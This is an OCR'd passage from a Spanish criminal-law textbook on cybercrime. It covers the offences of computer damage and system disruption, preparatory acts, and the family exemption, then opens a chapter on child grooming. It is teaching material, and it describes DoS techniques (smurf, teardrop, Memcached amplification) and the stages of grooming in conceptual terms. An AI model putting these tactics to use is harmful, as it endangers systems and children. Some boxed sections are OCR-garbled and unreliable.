atención a las circunstancias concurrentes, lo que en muchos supuestos determina-
rá la necesidad de recabar dictámenes técnicos y/ o informes periciales en relación
con los extremos antes indicados".

Ej. 5.15: Patricio ha ven ido trabajando como delineante para Reme-
dios. En determinado momento le pidió a su jefa cambiar las condiciones
salariales y pasar a cobrar, además de un tanto por ciento por proyecto,
una cantidad fija de 1.300 euros, a lo que Remedios contestó que no po -
día, si bien le hizo una contra propuesta, que Patricio no aceptó. Como con-
secuencia unos días más tarde Patricio anunció de forma sorpresiva que
abandonaba el trabajo . Cuando Remedios quiso acceder a planos de varios
proyectos que ella dirigía y en los que Patricio también había trabajado
durante su permanencia en la empresa, se encontró con que este había
bloqueado el ordenador que ella puso a su disposición para tal fin. Ante
la negativa de Patricio a comunicarle la clave, Remedios tuvo que contra-
tar los servicios ele Maximiliano, un experto informático para que desblo-
queara el ordenador, tras lo cual se descubrió que Patricio había borrado
todos los archivos relativos a los proyectos en los que había intervenido.
De nuevo Remedios tuvo que utilizar los servicios de Maximiliano para
recuperar los archivos una vez desbloqueado el ordenado1~ Jo que se con-
siguió solo en parte, y originó retrasos en el cumplimento de obligaciones
contractuales de la empresa con sus clientes. La Sentencia ele la Audiencia
Provincial de Madrid de 03.06.2013 consideró a Patricio responsable de
un delito de daños informúticos, al afirmar que las consecuencias de su
conducta fueron sin duda graves.

Deberán considerarse de menor gravedad, y por tanto no delictivos, con


independencia de que su comisión dé lugar a otro tipo de responsabilidades,
por ejemplo civiles o administrativas, los supuestos en que el daño causado

- 217 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

o el riesgo generado para intereses públicos o privados sea insignificante, así


como los supuestos de escaso nivel de afección en la integridad de los datos o
de los sistemas.
Este delito solo se castiga en su forma dolosa, es decir, debe cometerse
con la conciencia y voluntad de dañar, deteriorar, alterar, suprimir o hacer
inaccesibles datos, programas o documentos electrónicos, sabiendo que son
ajenos y que además se actúa sin autorización.

1.2. Las agravantes específicas


El precepto introduce además subtipos agravados, con agravaciones de
distinto nivel.
a) En un primer nivel encontramos las siguientes:
i) Que el delito se cometa en el marco de una organización criminal.
Llama la atención que no se incluya aquí, como en los ciberdelitos
contenidos en el art. 197 bis y siguientes, el grupo criminal.
ii) Que el delito haya ocasionado daños de especial gravedad o afectado
a un número elevado de sistemas informáticos.
Se trata de dos circunstancias disyuntivas, de manera que no es nece-
sario que concurran ambas para aplicar la pena agravada. Nos encon-
tramos de nuevo con conceptos indeterminados: especial gravedad,
número elevado, que tendrán que ser dotados de contenido por la ju-
risprudencia.
En cuanto a la "especial gravedad" debe notarse que ya el tipo básico
exige que la conducta y el resultado sean graves, por lo que aquí se
exige un plus de gravedad, pero menos que en el último inciso de este
mismo número, cuando habla de "extrema gravedad". En definitiva,
los resultados menos graves no constituirán delito, los graves se lle-
varán al tipo básico, los especialmente graves a este primer nivel de
agravación y los de extrema gravedad al nivel siguiente.
Según la Circular 3/2017 deben llevarse al tipo básico aquellas acciones
ilícitas sobre los elementos lógicos que tuvieran trascendencia significativa o
generaran consecuencias apreciables en datos, programas informáticos o do-
cumentos electrónicos o en los intereses en juego. Procedería, en cambio, la
aplicación de este subtipo agravado en los supuestos en que los efectos del
delito fueran especialmente relevantes y no se hicieran merecedores por su
intensidad de la calificación de extrema gravedad a que se refiere el inciso úl-
timo del mismo precepto. A los efectos de aplicar uno u otro precepto y como

- 218 -
criterios de valoración habrían de tenerse en cuenta la posibilidad o no de re-
cuperar los datos informáticos, y, en el primer caso, el coste económico de la
reparación del daño causado, la complejidad técnica de los trabajos de recu-
peración, la duración de las tareas de recuperación, el valor del perjuicio cau-
sado al titular de los datos, bien como lucro cesante o como daño emergente.

En relación con la afectación a un número elevado de sistemas, si-


guiendo las indicaciones de la Directiva, esta agravación debería apli-
carse en los supuestos de ataques a gran escala en los que se afecta
a un número importante de sistemas de información, en particular,
cuando el ataque tiene por objeto crear una botnet, lo que representa
el peligro, de nuevo, de que a través de ella se lancen nuevos ataques
masivos.
iii) Que el hecho hubiera perjudicado gravemente el funcionamiento de
servicios públicos esenciales o la provisión de bienes de primera ne-
cesidad.
La Ley 8/2011, de 28 de abril, por la que se establecen medidas para la
protección de infraestructuras críticas, define en su art. 2 los servicios esen-
ciales como aquellos necesarios para el mantenimiento de las funciones so-
ciales básicas, la salud, la seguridad, el bienestar social y económico de los
ciudadanos, o el eficaz funcionamiento de las Instituciones del Estado y las
Administraciones Públicas.
Bienes de primera necesidad son aquellos que resulten imprescindibles
para la subsistencia y salud de las personas (STS de 22.12.2006), como los
alimentos, medicamentos, viviendas y otros productos de consumo necesario
para la subsistencia y salud de las personas (STS de 26.03.2003) .

iv)Que los hechos hayan afectado al sistema informático de una infraes-


tructura crítica o se hubiera creado una situación de peligro grave
para la seguridad del Estado, de la Unión Europea o de un Estado
Miembro de la Unión Europea.
El propio precepto nos da una definición de lo que considera infraes-
tructura crítica: un elemento, sistema o parte de este que sea esencial para el
mantenimiento de funciones vitales de la sociedad, la salud, la seguridad, la
protección y el bienestar económico y social de la población cuya perturba-
ción o destrucción tendría un impacto significativo al no poder mantener sus
funciones.

v) Que el delito se haya cometido utilizando alguno de los medios a que


se refiere el artículo 264 ter.
Es decir, por el uso del malware: programas informáticos concebidos o adap-
tados principalmente para cometer estos delitos, o bien de contraseñas de orde-

- 219 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

nadar, códigos de acceso o datos similares que pennitan acceder a la totalidad o


a una parte de un sistema de información. Lo cierto es que llama la atención esta
agravación, cuando en realidad será el método más común de comisión del delito,
hasta tal punto que la Circular 3/2017 llama a los fiscales a solicitar su aplicación
de manera restrictiva, solo cuando efectivamente se aprecie un plus de injusto.
b) En un segundo nivel de agravación encontramos la previsión si-
guiente: "Si los hechos hubieran resultado de extrema gravedad, podrá impo-
nerse la pena superior en grado", que ya hemos comentado.
c) Y el precepto establece todavía un tercer nivel de agravación para
los casos en que los hechos se hubieran cometido mediante la utilización ilí-
cita de datos personales de otra persona para facilitarse el acceso al sistema
informático o para ganarse la confianza de un tercero.
En realidad, la Directiva llamaba a agravar la sanción cuando en la comisión
de la infracción se utilizan ilícitamente datos de carácter personal de otra persona
con la finalidad de ganar la confianza de un tercero, causando así daños al propie-
tario legítimo de la identidad. La versión española varía bastante, pues no exige en
ningún caso el daño al tercero y añade el supuesto en el que los datos personales se
utilizan exclusivamente para facilitarse el acceso al sistema.

Los datos personales utilizados para facilitarse el acceso, directamente


o mediante la consecución con ello de la confianza de otro, deberán ser de
persona diferente a la víctima.

2. Obstaculización o interrupción del funcionamiento del sistema.


Artículo 264 bis Cp

El artículo 264 bis dispone:


l. Será castigado con la pena de prisión de seis meses a tres años el que, sin
estar autorizado y de manera grave, obstaculizara o interrumpiera el funcionamien-
to de un sistema informático ajeno:
a) realizando alguna de las conductas a que se refiere el artículo anterior;
b) introduciendo o transmitiendo datos; o
c) destruyendo, dañando, inutilizando, eliminando o sustituyendo un siste-
ma informático, telemático o de almacenamiento de información electró-
nica.
Si los hechos hubieran perjudicado de forma relevante la actividad normal de
una empresa, negocio o de una Administración pública, se impondrá la pena en su
mitad superior, pudiéndose alcanzar la pena superior en grado.
2. Se impondrá una pena de prisión de tres a ocho años y multa del triplo al
décuplo del perjuicio ocasionado, cuando en los hechos a que se refiere el apartado

- 220 -
Capitulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

anterior hubiera concurrido alguna de las circunstancias del apartado 2 del artículo
anterior.
3. Las penas previstas en los apartados anteriores se impondrán, en sus res-
pectivos casos, en su mitad superior, cuando los hechos se hubieran cometido me-
diante la utilización ilícita de datos personales de otra persona para facilitarse el
acceso al sistema informático o para ganarse la confianza de un tercero.

2.1. El tipo básico


La conducta castigada en este precepto consiste en obstaculizar o inte-
rrumpir el funcionamiento de un sistema informático ajeno sin estar autori-
zado y de manera grave. Las formas en que se deben conseguir esos resulta-
dos de obstaculización o interrupción son las siguientes:
a) borrando, dañando, deteriorando, alterando, suprimiendo, o ha-
ciendo inaccesibles datos, programas informáticos o documentos electróni-
cos ajenos;
Cuando la realización de las conductas previstas en el 264.1, además de los da-
ños a los datos, programas o documentos, provoque la obstaculización o interrup-
ción del funcionamiento del sistema, habrá que aplicar solo el 264 bis (concurso de
leyes) que prevé una pena mayor.

b) transmitiendo o introduciendo nuevos datos en el sistema.


Son típicos ataques de este tipo los conocidos como ataques de dene-
gación de servicios (DoS) si provienen de una sola fuente o ataques de de-
negación de servicios distribuido (DDoS) cuando provienen de una variedad
de nódulos, que ya explicamos en el capítulo 2. Generalmente se realizan a
través de una botnet (una red de equipos infectados), aunque van desarro-
llándose nuevos métodos.
Ej. 5.16: El 28 de febrero de 2018 GitHub, (una popular plataforma de
desarrollo colaborativo de software) sufrió un ataque DDoS que fue calificado
como el mayor de la historia hasta entonces (recibió 126,9 millones de paque-
tes que alcanzaron la cifra récord de 1,35 terabits por segundo) . En este caso los
atacantes no utilizaron una botnet, sino que aprovecharon la vulnerabilidad de
miles de servidores Memcached mal configurados, expuestos en Internet. Mem -
cached es un sistema de almacenamiento en caché (veáse el ejemplo 2.2) desti-
nado a agilizar las aplicaciones web, que reduce la carga de datos y aumenta la
velocidad de acceso. Los atacantes enviaron solicitudes a multitud de servido-
res Memcached falsificando la dirección IP del remitente, poniendo en su lugar
la de su víctima, haciendo asl que los sistemas respondieran enviando millones
de datos a la víctima.

- 221 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

Este tipo de ataques suelen utilizarse por hacktivistas (recordemos el


ejemplo 4.25) pero también, por ejemplo, para tumbar la reputación de la
competencia, o simplemente para causar un daño.
Existen varios tipos, uno de los más simples es el ataque de IP Flooding
(inundación de paquetes IP), que busca por lo general que se desborde el an-
cho de banda de conexión o que se agoten los recursos del sistema atacado.
Por ejemplo, cientos de miles de ordenadores zombies lanzan a la vez una pe-
tición de servicio a un servidor que se ve desbordado y no puede atender las
peticiones legítimas.
Los ataques pueden ser de distinto tipo, pero por ejemplo un ataque a
la capa de aplicación (véase el capítulo 2) provocaría la llegada al host de re-
cepción de cientos de miles de paquetes dirigidos a una aplicación específica,
que el servidor de destino será incapaz de procesar.
Otra modalidad de ataque DoS pretende aprovechar vulnerabilidades
del sistema atacado, de manera que se le envían paquetes con datos no pre-
vistos o alterados, o para los que no tiene una respuesta adecuada, lo que pro-
voca un fallo en el sistema, que entre en un bucle infinito, etc. según la moda-
lidad elegida.
Ej. 5.17: Por ejemplo, un ataque smwf consiste en enviar una petición de
servicio falseando la dirección IP de los paquetes. Como se explicó en el capítulo
2, cuando un cliente realiza una petición a un servidor utiliza la dirección del
servidor y el número de puerto correspondiente al servicio solicitado. A esta
petición le añade la información necesaria para recibir la respuesta que será la
dirección IP del cl iente (es decir su propia dirección IP) y un número de puerto
que atenderá esa respuesta. Un ataque smurf sustituye la dirección IP desde la
que se realiza la petición por la de la víctima (suplantación), y la solicitud se
envía a una red, de manera que todos los ordenadores de esa red contestarán a
la víctima saturándola.

Ej. 5.18: Los ataques teardrop son también una modalidad de DoS que
aprovecha la necesidad del protocolo IP de trocear la información en paquetes
cuando tiene un tamaño mayor de 64K (65.535 Bytes) , que a su vez deben frag -
mentarse para viajar. El protocolo IP específica, como vimos, unos campos en
el encabezado de cada paquete que indicarán si el paquete IP está fragmentado
(forma parte de un paquete mayor) y su posición. Pues bien, el ataque teardrop
aprovecha esta funcionalidad para confundir al sistema operativo en la recons-
trucción del datagrama original y lograr su colapso o al menos el del servicio
atacado. Para ello introduce información incoherente en los campos del encabe-
zado, de manera que los fragmentos se sobrepongan y se sobrescriban. Existen
muchos otros tipos de ataques DoS, también conocidos como stressers o booters,

- 222 -
Capítulo S. CIBERDELITOS EN SENTIDO ESTRICTO

todos tienen en común perseguir obstaculizar o interrumpir el funcionamiento


de un sistema informático. Por ejemplo, los ataques LAND, que se basan en fal-
sear la IP y puerto de origen para que sea la misma que la de destino, el ataque
Ping ele la muerte (Ping of death) que aprovecha de nuevo un error en las cabe-
ceras de los paquetes que impedirá el correcto reensamblaje en destino, ECHO-
CHARGEN o Snork, que es un ataque que origina un intercambio interminable
de paquetes entre dos sistemas, etc.

c) destruyendo, dañando, inutilizando, eliminando o sustituyendo el


propio sistema informático, telemático o de almacenamiento de información
electrónica en su conjunto.
Los requisitos "sin estar autorizado" y "de manera grave" deben ser in-
terpretados en el sentido ya visto en el comentario a los preceptos anteriores.

2.2. Las agravantes específicas:


El precepto contiene, por una parte, las mismas circunstancias agravan-
tes en tres niveles que vimos en el artículo anterior y además, una agravación
específica: que los hechos hubieran perjudicado de forma relevante la activi-
dad normal de una empresa, negocio o de una Administración pública.

3. Actos preparatorios. Artículo 264 ter Cp

Artículo 264 ter


Será castigado con una pena de prisión de seis meses a dos años o multa de
tres a dieciocho meses el que, sin estar debidamente autorizado, produzca, adquie-
ra para su uso, importe o, de cualquier modo, facilite a terceros, con la intención
de facilitar la comisión de alguno de los delitos a que se refieren los dos artículos
anteriores:
a) un programa informático, concebido o adaptado principalmente para co-
meter alguno de los delitos a que se refieren los dos artículos anteriores; o
b) una contraseña de ordenador, un código de acceso o datos similares que
permitan acceder a la totalidad o a una parte de un sistema de informa-
ción.

Este precepto es paralelo al artículo 197 ter ya comentado, pero referi-


do a actos preparatorios de los delitos de daños informáticos de los artículos
264 y 264 bis.
La conducta típica consiste en producir, adquirir, importar, facilitar a
terceros, determinados instrumentos, sin estar autorizado y con la intención
de facilitar con ello la comisión de un delito de los previstos en los números

- 223 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRíMENES EN PARTICULAR

anteriores. Se castiga, por tanto, a quien fabrica un malware malicioso con


la intención de que sea utilizado para causar un daño informático grave, de
los considerados delictivos, quien lo adquiere con tal fin, quien lo facilita a
un tercero, quien descubriendo una vulnerabilidad diseña un programa de
ataque DoS, con la intención de cometer o favorecer la comisión de un delito
del art. 264 bis, etc.

4. Disposiciones comunes

4.1. Responsabilidad de las personas jurídicas


El Artículo 264 quáter establece la responsabilidad de las personas jurí-
dicas por la comisión de los delitos comprendidos en los tres artículos ante-
riores, en el mismo sentido que ya vimos para los delitos de acceso ilícito a un
sistema informático.

4.2. Excusa absolutoria


Según el artículo 268:
l. Están exentos de responsabilidad criminal y sujetos únicamente a la ci-
vil los cónyuges que no estuvieren separados legalmente o de hecho o en proceso
judicial de separación, divorcio o nulidad de su matrimonio y los ascendientes, des-
cendientes y hermanos por naturaleza o por adopción, así como los afines en pri-
mer grado si viviesen juntos, por los delitos patrimoniales que se causaren entre sí,
siempre que no concurra violencia o intimidación, o abuso de la vulnerabilidad de la
víctima, ya sea por razón de edad, o por tratarse de una persona con discapacidad.
2. Esta disposición no es aplicable a los extraños que participaren en el delito.

Este precepto incluye una excusa absolutoria por la cual una persona
no responde penalmente, sino solo civilmente, de los delitos cometidos sin
violencia ni intimidación contra el patrimonio de su cónyuge, descendiente,
ascendiente o hermanos o contra los suegros, yerno o nuera con los que con-
vivan. La excusa absolutoria no se extiende a personas que hayan interveni-
do en el delito (inductores, coautores, cooperadores necesarios, cómplices ... )
que no presenten los citados grados de parentesco con el sujeto pasivo.
Esta causa personal de exención de la pena, que opera excluyendo la puni-
bilidad de una conducta típica, antijurídica y culpable, se fundamenta en razones
político-criminales: no se considera conveniente que el Derecho penal intervenga
en las relaciones familiares, dejando que estos conflictos se resuelvan por la vía ci-
vil, menos traumática y por tanto de consecuencias más fácilmente reparables. Sin
embargo, no faltan voces críticas que ponen de manifiesto la desprotección que se
produce en estos casos y que abogan por la supresión de esta eximente y su sustitu-

- 224 -
Capítulo 5. CIBERDELITOS EN SENTIDO ESTRlCTO

ción por la conversión de estos delitos en privados o semiprivados, es decir, perse-


guibles solo a instancia de parte, de manera que cada cual pudiera decidir si inicia o
no acciones penales contra su pariente.

Surge la duda de si el precepto es aplicable a los delitos de daños infor-


máticos. La solución depende, en buena medida, de la decisión sobre el bien
jurídico protegido. Si restamos importancia al carácter patrimonial de estos
delitos, y en cambio defendemos que el bien jurídicos protegido es la inte-
gridad y la disponibilidad de los sistemas informáticos, abogaremos por la
no aplicación de la excusa absolutoria. Sin embargo, y pesar de que de lege
ferenda sería deseable esta solución, mientas el legislador mantenga estos
delitos en el Título XIII, bajo la rúbrica "Delitos contra el patrimonio y contra
el orden socioeconómico", parece que no queda más remedio que considerar
que les alcanza el artículo 268.
Ej. 5.19: El Auto de la Audiencia Provincial de Madrid de 28.02.2019,
considera aplicable la excusa absolutoria del art. 268 CP en un supuesto
de daños informáticos. El delito se había rnmetido en el seno de una so-
ciedad mercantil de carácter familiar integrada por tres socios, la madre
-administradora única de dicha sociedad- y dos hermanos, siendo uno
de ellos el denunciado por el borrado de datos informáticos r eferidos a
los clientes principales de la empresa. Los denunciantes apelaban al bien
jurídico protegido, que identificaban como la seguridad informática, para
excluir la excusa absolutoria, pero el tribunal insistió en el carácter patri-
monial del delito, dando más peso a su ub icación sistemática.

Existen discrepancias en la jurisprudencia sobre la aplicación de la eximente


en los casos en que el sujeto pasivo es una sociedad cuyos socios son todos parien-
tes de los mencionados en el art. 268. Algunas sentencias han considerado que al
tener la sociedad una personalidad jurídica independiente ya no le es aplicable al
delincuente la excusa absolutoria (SSTS de 08.07.1983 y de 12.12.2018). En cambio,
otras sentencias, aplicando la doctrina del levantamiento del velo, han decidido que
si tras la sociedad se encuentran exclusivamente los intereses de los parientes men-
cionados en el art. 286, sí es aplicable la eximente (27.01.2006).

Ej. 5.20: En el ejemplo 5: 19 la Audi encia Provincial de Madrid apeló a


la doctrina del levantamiento del velo para cons iderar aplicable al caso la
excusa absolutoria del 268 CP.

- 225 -
Cibercriminalidad.
Tercera parte. LOS CIBERCR.ÍMENES EN PARTICULAR

CONCEPTOS CLAVE

, fra;cking, . · · io · ormátiéJ>, hac on;i,b,;,e,rq ·blanco!


ck mbre,ro ,n~ sombrero gris, sistema de infórmacion;
· ed gui id~d. j e transmisiones, emisiones electromag-
éti~as, anos.informáticos o stacufü;ación o'interrupción·qe- · namierito
l s· (le d, . ~ seryicio~,::excu~a ~b'sor
, ,<: ., ' '<\,~· . - ~, r,

EJERCICIOS DE AUTOEVALUACIÓN
l. ¿Por qué se considera errónea la ubicación sistemática elegida por el legislador
español para regular los delitos de intrusismo informático?
2. ¿Es lícita la actividad de los llamados hackers de sombrero blanco o hacking éti-
co? Explique su repuesta.
3. ¿Constituye delito de intrusismo informático el acceso a un router ajeno sin au-
torización y vulnerando su contraseña de seguridad? Explique su repuesta.
4. ¿Constituye delito acceder a un sistema informático ajeno, sin autorización de
su titular, utilizando para ello las claves personales de otro, si las mismas no se
han conseguido por medios subrepticios o ilícitos?
5. Si un experto es contratado para revisar la seguridad de un sistema informático
ajeno y con tal fin entra en el mismo con la autorización de su titular, pero apro -
vecha la situación para, una vez finalizada su auditoría, en lugar de abandonar
por completo el sistema, dejar instalado en él un malware que le permite con-
trolarlo. ¿Está cometiendo un delito?
6. Un sujeto oferta por Internet, a cambio de dinero, programas informáticos para
entrar en un sistema informático ajeno. Él solo proporciona los programas,
pero no accede él mismo al sistema ajeno, sino que informa a sus clientes de
cómo hacerlo. ¿Su actividad es delictiva?
7. Una organización criminal se introduce sin autorización y vulnerando las me-
dadas de seguridad en el sistema informático del Ministerio de Justicia. ¿Es ne-
cesaria denuncia previa para perseguir penalmente el delito?
8. Un sujeto, a través de un pendrive infectado, ha introducido en el ordenador de
un compañero un malware que muestra su caricatura al iniciar el ordenador. El
daño causado en la funcionalidad del sistema es insignificante. ¿Puede ser acu-
sado de un delito de daños informáticos?
9. Usted pertenece a una organización de defensa de los animales. Un día recibe
un correo electrónico de su organización en el que le piden que, como forma de
protesta, participe en un ataque coordinado contra la página web de un partido

- 226 -
Capitulo S. CIBERDELITOS EN SENTIDO ESTRICTO

político que defiende las corridas de toros, con el objetivo de provocar una de-
negación de servicios por saturación de sus servidores. ¿De aceptar la propues-
ta, qué consecuencias podría tener para usted esa conducta?
10. Manuel, de 19 años de edad, molesto porque su hermano Javier, de 23, está sa-
liendo con la chica que a él le gusta, envía a su hermano un correo electrónico
con un malware que al ejecutarse borra todos los archivos del ordenador de
Javíer, entre ellos su trabajo fin de grado, del que no tenía copia de seguridad, y
que debe presentar en el plazo de dos días. ¿Ha cometido Manuel algún delito?
¿Cuál? ¿Cuáles serían las consecuencias para él?

- 227 -
Capítulo 6
Cibercrimenes en sentido amplio
OBJETIVOS DEL CAPÍTULO

':"$1' ,., • '· ~-• ~,;"' w¿:· . . ·, . , . d~\ . ~, >·-).':-,.


Ert'este capitufo vam,os a'estudiar, desde un punto de vistá normativo' adl- ,
más de feoomenoiógicó, la batería de delitos que, desde la panorámica de la
utili~.ación de las 'TIC, han resultado afecta.dos en $U tipificación en el vigente '
"· Códjgo Penal. En los deUtos contra la Íl).timtdad, contra la propiedad, y contra
la propié~ad iñte\ectual, las TIC repÍ"esentan ia incorporación: dé nuevas :tipch,
logias"delictivas eh las qu~'la Utilización de est~s tecnologías es indispensable.
En ~á.mbio, la segtinda parte del ~apítulo ~stá orientada al análisis de las nuev~~
modalidades de comisión .a través de las TIC de los denominados delitos tlási-
. ios,\ iomo la estaf:;i, las falsedades o el blanqúeo .de capitales, entre otros. ·'
. ~'. } (;':' . ·~ ~:. ' / ' .. ,-t . t
I. NUEVAS TIPOLOGÍAS DELICTIVAS

l. Nuevos delitos contra la intimidad y la indemnidad sexual

La extensión de la utilización de Internet y de las TIC con fines delictivos


ha obligado al legislador español a regular conductas delictivas cometidas a
través del ciberespacio o las nuevas formas de telecomunicación. Así, la Direc-
tiva 2011/92/UE, del Parlamento Europeo y del Consejo de 13 de diciembre
de 2011, relativa a la lucha contra los abusos sexuales y la explotación sexual
de los menores y la pornografía infantil, por la que se sustituye la Decisión
Marco 2004/68JA1 del Consejo, expresaba claramente su preocupación sobre
el ciberacoso infantil considerándolo "una de las formas graves de abusos se-
xuales y explotación sexual de los menores" por el anonimato que Internet
permite al delincuente. En su art. 6 impone la necesidad de que los Estados
parte castiguen cualquier tentativa de un adulto, por medio de las tecnologías
de la información y la comunicación, de adquirir, poseer o generar pornogra-
fía infantil mediante el embaucamiento de un menor que no ha alcanzado la
edad del consentimiento sexual para que le proporcione pornografía infantil
en la que represente a dicho menor (CuGAT MAURI, 2014).
El ciberacoso infantil o child grooming y el sexting (vocablo proveniente
de los términos anglosajones sexy texting, que se refiere al envío de mensajes
sexuales, eróticos o pornográficos, por medio de las TIC), en sus dos posibles
modalidades, son comportamientos delictivos que atentan fundamentalmen-
te contra los bienes jurídicos intimidad personal y libertad o indemnidad se-
xual. Aunque tienen su base en conductas que puedan realizarse en el mundo

- 231 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRíMENES EN PARTICULAR

físico -acoso sexual, chantaje, descubrimiento y revelación de secretos-, su


comisión a través de medios digitales las dota de una especial peligrosidad.

1.1. Groomíng (art. 183 ter CP)

a) Fenomenología delgroomíng y perfil del delincuente.


Como veremos en el siguiente epígrafe, la regulación del groomíng en el
Código penal español abarca dos modalidades, que tienen en común el embau-
camiento del menor a través de las TIC, la primera con la finalidad de facilitarse
un encuentro con la intención de cometer sobre él un delito sexual y la segunda
con la finalidad de obtener imágenes pornográficas de un propio menor.
Aunque el precepto penal no lo contempla, en la práctica la segunda mo-
dalidad puede estar dirigida a la comisión de un delito de pornografía infan-
til, pero también a la extorsión del menor.
Para conseguir su objetivo, los groomers por lo general crean perfiles
falsos en redes sociales u otras plataformas de chat similares inventándose
una vida o persona que no son. Normalmente actúan enviando un mismo o
similares mensajes a varios menores, pudiendo llegar a tener, a la vez, con-
tacto con varios de ellos por diversos medios virtuales (v. gr. Facebook, Skype,
etc.). Aunque como veremos, la jurisprudencia también ha aplicado este deli-
to a personas que conocían previamente al menor, es decir, que no ocultan su
verdadera identidad, pero que utilizan las TIC para ganarse la confianza del
menor mediante otros ardices. Como veremos, el verbo elegido por el legis-
lador es embaucar, por lo que en nuestra opinión exige siempre algún tipo de
engaño o manipulación.
Además de entablar conversaciones por tiempos prolongados, el propósi-
to del diálogo es establecer confianza y, bien conseguir un encuentro personal
con el menor, bien pedir al menor contenido sexualmente explícito. En nume-
rosas ocasiones ambas modalidades se entremezclan. Las fotos y vídeos eróti-
cos son el principal medio de acción del child groomíng, este primer paso puede
producir un encuentro físico, a veces bajo amenazas de revelar públicamente
los vídeos si el menor no consiente, lo que desenlaza en un acoso moral (STS
174/2017, de 21 marzo; SSAP Madrid 705/2018 de 18 octubre; Barcelona
949/2017, de 22 diciembre) y desliza la conducta hacia el delito de sextorsión.
El perfil de esta delincuencia es heterogéneo y no necesariamente se suje-
ta a una tipología definida en términos criminológicos. El delito es común, pues
no se exige ninguna cualidad específica para ser autor, pudiendo serlo por igual
adultos o menores de edad de catorce años en adelante, en cuyo caso sería de

- 232 -
Capítulo 6. CIBERCfilMENES N SENTIDO AMPLIO

aplicación alguna de las medidas previstas en la Ley Orgánica 5/2000, de 12 de


enero, Reguladora de la Responsabilidad penal de los Menores (PANizo GALANDE,
2011; PÉREZ FERRER, 2012), sin perjuicio de la exención de punibilidad que prevé
el art. 183 quáter CP, cuando las edades del victimario y la víctima, así como el
grado de madurez, sean próximas. No obstante, lo cierto es que se trata de una
conducta fundamentalmente pensada para la criminalización del ciberacoso
sexual con víctimas menores de edad por parte de adultos.
Aunque es habitual asociar la figura del acosador sexual a la categoría
de los denominados sexual predators (psicópatas sexuales), en la mayoría de
los casos se trata de personas plenamente imputables, sin que se observen
graves patologías psiquiátricas.
Un perfil especialmente propenso a la comisión de estos delitos es el pe-
dófilo -aunque no todos los pedófilos llegan a abusar o a agredir sexualmente
a un menor-. La pedofilia, como trastorno o desviación en la elección del ob-
jeto sexual, consiste en el deseo de mantener contacto sexual con individuos
sexualmente inmaduros (HEREDIA MARTfNEZ, 2008). Existe un cierto consenso
en que esta parafilia no altera por sí sola la capacidad del sujeto de conocer
la ilicitud de su conducta o actuar conforme a ese conocimiento, a pesar de lo
cual el pedófilo siente una pulsión tan fuerte que obvia el daño que causa o,
la mayoría de las veces, lo minimiza o se auto-justifica mediante una serie de
distorsiones cognitivas (del tipo: lo que hago no es realmente sexo sino una
muestra de cariño, al niño le gusta, esto mejora nuestra relación ... ) (MARco
FRANCIA, 2015).
Cuando la pedofilia está asociada a otro trastorno psicopatológico corno
un retraso mental, una demencia degenerativa o un alcoholismo, por ejemplo,
la doctrina habla de pedofilia "secundaria". En estos casos habrá que anali-
zar la posible exclusión o disminución de la imputabilidad del sujeto (TRABAZO
ARIAS & AzoR LAFARGA, 2009). Sin embargo, esta relación no es general, hablán-
dose en el resto de casos de pedofilia "primaria" (O1rvERIO & GRAzrosr, 2004).
Los pedófilos son mayoritariamente varones (solo un 13% aproximada-
mente son mujeres), suelen cometer el abuso sexual entre los 30 y 50 años de
edad (a pesar de que un 20% de los agresores son adolescentes), suelen estar
casados, son con frecuencia familiares o allegados de la víctima (profesores,
vecinos, etc.), su apariencia es completamente normal; tienen un estilo con-
vencional, suelen tener una inteligencia media y no son psicóticos. Aunque la
mayoría de los pedófilos no causan lesiones físicas a los niños, existe una va-
riante muy peligrosa que son los pedófilos con rasgos sádicos y que practican
el denominado "pedosadismo". Estos sujetos además de sentir una atracción
sexual por los niños, sienten placer infringiéndoles daño o sometiéndolos, y

- 233 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

pueden llegar en los casos más graves a matar a su víctima (OuvErno Y GRAzrosr,
2004, TRABAZO ARIAS c1 AZOR LAFARGA, 2009).
La conducta puede revestir carácter homosexual o heterosexual. La re-
lación que se busca por lo general es masturbatoria y muy excepcionalmente
copulativa. Aunque existen muchos perfiles diferentes de pedófilos, se ha seña-
lado que los pedófilos on line suelen ser individuos inhibidos, con escasas re-
laciones sociales y con frecuencia no han tenido la experiencia de una relación
sexual madura (SANTA CECILIA GARcfA, 2014). El móvil suele el de satisfacer los de-
seos o instintos libidinosos del sujeto, aunque también puede ser económico
en el caso de las organizaciones dedicadas al tráfico de pornografía infantil.
Las fases por las que suele pasar el proceso o técnicas que utilizan los
pedófilos en la comisión de groomimg son (SAP Málaga 5/2018, de 5 abril):
i. Ingreso en salones de chat públicos con nicks llamativos para el me-
nor y creación de lazos emocionales de amistad con el mismo, nor-
malmente simulando ser otro menor.
ii. Obtención de datos personales y de contacto con el menor. Utilización
de tácticas como la seducción, la provocación, el envío de imágenes
de contenido pornográfico.
iii. Obtención de desnudos del menor o realización por este de actos de
naturaleza sexual frente a la webcam o mediante fotografías de igual
tipo.
iv. Ciberacoso del menor a través del chantaje para la obtención de más
material pornográfico o conseguir un encuentro físico con el menor
para abusar sexualmente de él.
v. Extensión temporal del proceso durante semanas, incluso meses.

b) Regulación legal del grooming


El denominado child grooming se encuentra regulado en el art. 183 ter
de nuestro vigente Código penal:
l. El que a través de internet, del teléfono o de cualquier otra tecnología de
la información y la comunicación contacte con un menor de dieciséis años
y proponga concertar un encuentro con el mismo a fin de cometer cual-
quiera de los delitos descritos en los artículos 183 y 189, siempre que tal
propuesta se acompañe de actos materiales encaminados al acercamien-
to, será castigado con la pena de uno a tres años de prisión o multa de
doce a veinticuatro meses, sin perjuicio de las penas correspondientes a
los delitos en su caso cometidos. Las penas se impondrán en su mitad su-

- 234 -
Capitulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

perior cuando el acercamiento se obtenga mediante coacción, intimida-


ción o engaño.
2. El que a través de internet, del teléfono o de cualquier otra tecnología de la
información y la comunicación contacte con un menor de dieciséis años y
realice actos dirigidos a embaucarle para que le facilite material pornográfi-
co o le muestre imágenes pornográficas en las que se represente o aparezca
un menor, será castigado con una pena de prisión de seis meses a dos años.

